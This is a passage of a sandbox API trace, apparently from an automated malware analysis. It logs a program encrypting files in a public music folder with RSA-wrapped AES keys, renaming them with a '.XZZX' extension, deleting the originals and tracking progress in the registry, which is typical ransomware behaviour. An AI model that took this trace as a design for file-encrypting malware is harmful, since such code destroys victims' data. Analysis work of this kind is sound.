nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x4362808*, lpNumberOfBytesWritten=0x420e438*=0x17c, lpOverlapped=0x0) returned 1 [0142.185] SetFilePointer (in: hFile=0x884, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17c [0142.185] WriteFile (in: hFile=0x884, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0142.185] SetFilePointer (in: hFile=0x884, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x181 [0142.185] WriteFile (in: hFile=0x884, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x16, lpOverlapped=0x0) returned 1 [0142.185] SetFilePointer (in: hFile=0x884, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x197 [0142.186] WriteFile (in: hFile=0x884, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0142.186] SetFilePointer (in: hFile=0x884, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x19c [0142.186] SetErrorMode (uMode=0x1) returned 0x1 [0142.186] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0142.186] OutputDebugStringW (lpOutputString="end") [0142.186] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0142.186] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0142.186] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x43791d8) returned 1 [0142.187] CryptImportPublicKeyInfo (in: hCryptProv=0x43791d8, dwCertEncodingType=0x1, pInfo=0x3cf2550*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf2580*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf2588*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3d11858) returned 1 [0142.187] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0142.187] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0142.187] CryptEncrypt (in: hKey=0x3d11858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0142.188] CryptEncrypt (in: hKey=0x3d11858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43792e8*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43792e8*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0142.188] WriteFile (in: hFile=0x884, lpBuffer=0x43792e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x43792e8*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0142.188] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0142.188] WriteFile (in: hFile=0x884, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0142.188] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0142.188] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0142.188] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x890) returned 0x0 [0142.188] RegQueryValueExW (in: hKey=0x890, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xc9, lpcbData=0x420dfdc*=0x4) returned 0x0 [0142.188] RegCloseKey (hKey=0x890) returned 0x0 [0142.188] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x890) returned 0x0 [0142.189] RegSetValueExW (in: hKey=0x890, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xca, cbData=0x4 | out: lpData=0x420dfec*=0xca) returned 0x0 [0142.189] RegCloseKey (hKey=0x890) returned 0x0 [0142.189] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.189] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.189] CloseHandle (hObject=0x884) returned 1 [0142.190] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0142.190] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0142.191] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini")) returned 1 [0142.191] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini")) returned 0 Thread: id = 507 os_tid = 0xb4c [0142.122] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0142.122] lstrcpyW (in: lpString1=0x434f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0142.122] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0142.122] SetErrorMode (uMode=0x1) returned 0x1 [0142.122] lstrcpyW (in: lpString1=0x434f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0142.122] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x7b8242f, Data2=0x3f4f, Data3=0x4fd8, Data4=([0]=0xa0, [1]=0xe0, [2]=0x2b, [3]=0xe7, [4]=0xbc, [5]=0x6, [6]=0x5f, [7]=0x6d))) returned 0x0 [0142.122] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned 50 [0142.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0142.122] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\B2BABB8113BECBA807B8242F17F3AFF0.XZZX") returned 76 [0142.122] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0142.122] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini", dwFileAttributes=0x20) returned 1 [0142.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x884 [0142.149] ReadFile (in: hFile=0x884, lpBuffer=0x437bd00, nNumberOfBytesToRead=0x24a, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x437bd00*, lpNumberOfBytesRead=0x434e418*=0x24a, lpOverlapped=0x0) returned 1 [0142.150] CloseHandle (hObject=0x884) returned 1 [0142.150] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0142.150] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0142.150] SetErrorMode (uMode=0x1) returned 0x1 [0142.151] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0142.151] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x4379260) returned 1 [0142.153] CryptGenKey (in: hProv=0x4379260, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11918) returned 1 [0142.390] CryptExportKey (in: hKey=0x3d11918, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0142.390] CryptExportKey (in: hKey=0x3d11918, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x434e41c | out: pbData=0x4350000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0142.390] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0142.390] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0142.391] CryptDestroyKey (hKey=0x3d11918) returned 1 [0142.391] CryptReleaseContext (hProv=0x4379260, dwFlags=0x0) returned 1 [0142.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\B2BABB8113BECBA807B8242F17F3AFF0.XZZX" (normalized: "c:\\users\\public\\music\\sample music\\b2babb8113becba807b8242f17f3aff0.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x870 [0142.391] WriteFile (in: hFile=0x870, lpBuffer=0x437bd00*, nNumberOfBytesToWrite=0x24a, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x437bd00*, lpNumberOfBytesWritten=0x434e438*=0x24a, lpOverlapped=0x0) returned 1 [0142.392] SetFilePointer (in: hFile=0x870, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x24a [0142.392] WriteFile (in: hFile=0x870, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0142.392] SetFilePointer (in: hFile=0x870, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x24f [0142.392] WriteFile (in: hFile=0x870, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x16, lpOverlapped=0x0) returned 1 [0142.392] SetFilePointer (in: hFile=0x870, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x265 [0142.392] WriteFile (in: hFile=0x870, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0142.392] SetFilePointer (in: hFile=0x870, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x26a [0142.392] SetErrorMode (uMode=0x1) returned 0x1 [0142.392] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0142.392] OutputDebugStringW (lpOutputString="end") [0142.393] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0142.393] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0142.393] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x4379260) returned 1 [0142.394] CryptImportPublicKeyInfo (in: hCryptProv=0x4379260, dwCertEncodingType=0x1, pInfo=0x3cf2210*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf2240*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf2248*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3d11958) returned 1 [0142.394] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0142.394] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0142.394] CryptEncrypt (in: hKey=0x3d11958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0142.394] CryptEncrypt (in: hKey=0x3d11958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4379370*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x4379370*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0142.394] WriteFile (in: hFile=0x870, lpBuffer=0x4379370*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x4379370*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0142.394] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0142.395] WriteFile (in: hFile=0x870, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0142.395] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0142.395] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0142.395] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x878) returned 0x0 [0142.395] RegQueryValueExW (in: hKey=0x878, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0xca, lpcbData=0x434dfdc*=0x4) returned 0x0 [0142.395] RegCloseKey (hKey=0x878) returned 0x0 [0142.395] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x878) returned 0x0 [0142.395] RegSetValueExW (in: hKey=0x878, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xcb, cbData=0x4 | out: lpData=0x434dfec*=0xcb) returned 0x0 [0142.396] RegCloseKey (hKey=0x878) returned 0x0 [0142.396] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.396] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.396] CloseHandle (hObject=0x870) returned 1 [0142.397] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0142.398] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0142.398] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini")) returned 1 [0142.398] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini")) returned 0 Thread: id = 508 os_tid = 0xb50 [0142.543] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0142.544] lstrcpyW (in: lpString1=0x420f460, lpString2="Kalimba.mp3" | out: lpString1="Kalimba.mp3") returned="Kalimba.mp3" [0142.544] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0142.544] SetErrorMode (uMode=0x1) returned 0x1 [0142.544] lstrcpyW (in: lpString1=0x420f860, lpString2="Kalimba.mp3" | out: lpString1="Kalimba.mp3") returned="Kalimba.mp3" [0142.544] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xb3a600c1, Data2=0x62fd, Data3=0x445e, Data4=([0]=0x9b, [1]=0xf3, [2]=0x34, [3]=0x2b, [4]=0xe8, [5]=0xe4, [6]=0x29, [7]=0x63))) returned 0x0 [0142.544] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0142.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0142.544] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\1758A0BD1A6F8CE6B3A600C11E90712E.XZZX") returned 76 [0142.544] StrStrW (lpFirst="Kalimba.mp3", lpSrch="XZZX") returned 0x0 [0142.544] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", dwFileAttributes=0x20) returned 1 [0142.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88c [0142.544] CreateFileMappingW (hFile=0x88c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x870 [0142.544] MapViewOfFile (hFileMappingObject=0x870, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2dc6c0) returned 0x4560000 [0142.546] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0142.546] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0142.546] SetErrorMode (uMode=0x1) returned 0x1 [0142.546] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0142.546] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43793f8) returned 1 [0142.549] CryptGenKey (in: hProv=0x43793f8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11918) returned 1 [0142.648] CryptExportKey (in: hKey=0x3d11918, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e420 | out: pbData=0x0*, pdwDataLen=0x420e420*=0x94) returned 1 [0142.649] CryptExportKey (in: hKey=0x3d11918, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e420 | out: pbData=0x40e0000*, pdwDataLen=0x420e420*=0x94) returned 1 [0142.649] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0142.649] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0142.649] CryptDestroyKey (hKey=0x3d11918) returned 1 [0142.649] CryptReleaseContext (hProv=0x43793f8, dwFlags=0x0) returned 1 [0142.996] UnmapViewOfFile (lpBaseAddress=0x4560000) returned 1 [0143.099] CloseHandle (hObject=0x870) returned 1 [0143.099] SetFilePointer (in: hFile=0x88c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8064f1 [0143.099] WriteFile (in: hFile=0x88c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e42c*=0x5, lpOverlapped=0x0) returned 1 [0143.168] SetFilePointer (in: hFile=0x88c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8064f6 [0143.168] WriteFile (in: hFile=0x88c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x420e42c, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e42c*=0x16, lpOverlapped=0x0) returned 1 [0143.168] SetFilePointer (in: hFile=0x88c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x80650c [0143.168] WriteFile (in: hFile=0x88c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e42c*=0x5, lpOverlapped=0x0) returned 1 [0143.169] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, 